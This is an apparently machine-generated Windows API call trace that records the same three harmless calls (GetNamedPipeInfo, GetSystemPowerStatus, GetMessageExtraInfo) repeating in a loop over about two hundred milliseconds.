	[0129.853] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.853] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.853] GetMessageExtraInfo () returned 0x0
	[0129.854] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.854] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.854] GetMessageExtraInfo () returned 0x0
	[0129.855] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.855] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.855] GetMessageExtraInfo () returned 0x0
	[0129.856] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.856] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.856] GetMessageExtraInfo () returned 0x0
	[0129.857] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.857] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.857] GetMessageExtraInfo () returned 0x0
	[0129.858] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.858] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.858] GetMessageExtraInfo () returned 0x0
	[0129.858] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.858] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.858] GetMessageExtraInfo () returned 0x0
	[0129.861] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.861] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.861] GetMessageExtraInfo () returned 0x0
	[0129.861] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.861] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.861] GetMessageExtraInfo () returned 0x0
	[0129.862] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.862] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.862] GetMessageExtraInfo () returned 0x0
	[0129.863] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.863] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.863] GetMessageExtraInfo () returned 0x0
	[0129.864] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.864] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.864] GetMessageExtraInfo () returned 0x0
	[0129.874] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.874] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.874] GetMessageExtraInfo () returned 0x0
	[0129.877] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.877] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.877] GetMessageExtraInfo () returned 0x0
	[0129.884] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.884] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.884] GetMessageExtraInfo () returned 0x0
	[0129.885] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.885] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.885] GetMessageExtraInfo () returned 0x0
	[0129.886] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.886] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.886] GetMessageExtraInfo () returned 0x0
	[0129.886] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.886] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.886] GetMessageExtraInfo () returned 0x0
	[0129.887] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.887] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.887] GetMessageExtraInfo () returned 0x0
	[0129.888] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.888] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.888] GetMessageExtraInfo () returned 0x0
	[0129.888] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.888] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.888] GetMessageExtraInfo () returned 0x0
	[0129.889] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.889] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.889] GetMessageExtraInfo () returned 0x0
	[0129.904] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.904] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.904] GetMessageExtraInfo () returned 0x0
	[0129.905] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.905] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.905] GetMessageExtraInfo () returned 0x0
	[0129.906] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.906] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.906] GetMessageExtraInfo () returned 0x0
	[0129.907] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.907] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.907] GetMessageExtraInfo () returned 0x0
	[0129.907] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.907] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.907] GetMessageExtraInfo () returned 0x0
	[0129.908] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.908] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.908] GetMessageExtraInfo () returned 0x0
	[0129.908] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.908] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.908] GetMessageExtraInfo () returned 0x0
	[0129.909] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.909] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.909] GetMessageExtraInfo () returned 0x0
	[0129.909] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.909] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.910] GetMessageExtraInfo () returned 0x0
	[0129.910] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.910] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.910] GetMessageExtraInfo () returned 0x0
	[0129.910] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.910] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.910] GetMessageExtraInfo () returned 0x0
	[0129.911] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.911] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.911] GetMessageExtraInfo () returned 0x0
	[0129.912] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.912] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.912] GetMessageExtraInfo () returned 0x0
	[0129.913] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.915] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.915] GetMessageExtraInfo () returned 0x0
	[0129.988] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.988] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.988] GetMessageExtraInfo () returned 0x0
	[0129.988] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.988] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.988] GetMessageExtraInfo () returned 0x0
	[0129.989] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.989] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.989] GetMessageExtraInfo () returned 0x0
	[0129.990] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.990] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.990] GetMessageExtraInfo () returned 0x0
	[0129.990] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.990] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.990] GetMessageExtraInfo () returned 0x0
	[0129.991] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.991] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.991] GetMessageExtraInfo () returned 0x0
	[0129.991] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.991] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.991] GetMessageExtraInfo () returned 0x0
	[0129.992] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.992] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.992] GetMessageExtraInfo () returned 0x0
	[0129.992] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.993] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.993] GetMessageExtraInfo () returned 0x0
	[0129.993] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.993] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.993] GetMessageExtraInfo () returned 0x0
	[0129.994] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0129.994] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0129.994] GetMessageExtraInfo () returned 0x0
	[0130.009] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.009] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.009] GetMessageExtraInfo () returned 0x0
	[0130.026] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.026] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.026] GetMessageExtraInfo () returned 0x0
	[0130.027] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.027] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.027] GetMessageExtraInfo () returned 0x0
	[0130.028] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.028] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.028] GetMessageExtraInfo () returned 0x0
	[0130.029] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.029] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.029] GetMessageExtraInfo () returned 0x0
	[0130.029] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.029] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.029] GetMessageExtraInfo () returned 0x0
	[0130.034] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.034] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.034] GetMessageExtraInfo () returned 0x0
	[0130.038] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.038] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.038] GetMessageExtraInfo () returned 0x0
	[0130.044] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.044] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.044] GetMessageExtraInfo () returned 0x0
	[0130.045] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.045] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.045] GetMessageExtraInfo () returned 0x0
	[0130.054] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.054] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.056] GetMessageExtraInfo () returned 0x0
	[0130.057] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.057] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.057] GetMessageExtraInfo () returned 0x0
	[0130.057] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.057] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.057] GetMessageExtraInfo () returned 0x0
	[0130.058] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.058] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.058] GetMessageExtraInfo () returned 0x0
	[0130.059] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.059] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.059] GetMessageExtraInfo () returned 0x0
	[0130.060] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.060] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.060] GetMessageExtraInfo () returned 0x0
	[0130.061] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.061] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.061] GetMessageExtraInfo () returned 0x0
